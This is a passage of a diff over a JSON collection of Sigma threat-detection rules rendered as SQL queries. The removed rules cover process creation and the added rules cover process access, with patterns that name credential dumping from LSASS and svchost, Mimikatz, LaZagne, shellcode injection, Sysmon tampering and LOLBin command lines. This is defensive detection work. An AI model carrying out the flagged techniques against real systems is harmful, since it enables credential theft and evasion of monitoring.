'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "status": "test", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "System administrator Usage" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1047" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", - "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1574" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE 